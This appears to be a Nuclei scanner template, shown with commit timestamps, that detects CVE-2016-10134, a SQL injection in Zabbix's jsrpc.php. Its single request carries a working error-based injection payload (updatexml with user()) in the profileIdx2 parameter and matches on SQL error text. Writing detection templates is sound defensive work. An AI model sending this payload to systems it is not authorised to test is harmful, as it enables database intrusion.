2022-01-04 10:21:37 +00:00
id : CVE-2016-10134
info :
2022-05-10 15:59:14 +00:00
name : Zabbix - SQL Injection
2022-01-04 10:21:37 +00:00
author : princechaddha
severity : critical
2022-05-10 15:59:14 +00:00
description : "Zabbix before 2.2.14 and 3.0 before 3.0.4 allows remote attackers to execute arbitrary SQL commands via the toggle_ids array parameter in latest.php and perform SQL injection attacks."
2022-01-04 10:21:37 +00:00
reference :
- https://github.com/vulhub/vulhub/tree/master/zabbix/CVE-2016-10134
- https://nvd.nist.gov/vuln/detail/CVE-2016-10134
2022-01-05 07:37:34 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
2022-04-22 10:38:41 +00:00
cvss-score : 9.8
2022-01-05 07:37:34 +00:00
cve-id : CVE-2016-10134
cwe-id : CWE-89
2022-04-22 10:38:41 +00:00
tags : cve,cve2016,zabbix,sqli
2022-01-04 10:21:37 +00:00
requests :
- method : GET
path :
- "{{BaseURL}}/jsrpc.php?type=0&mode=1&method=screen.get&profileIdx=web.item.graph&resourcetype=17&profileIdx2=updatexml(0,concat(0xa,user()),0)::"
matchers-condition : and
matchers :
- type : word
part : body
words :
- 'Error in query [INSERT INTO profiles (profileid, userid'
- 'You have an error in your SQL syntax'
condition : and
- type : status
status :
- 200
2022-05-10 15:59:14 +00:00
# Enhanced by mp on 2022/05/10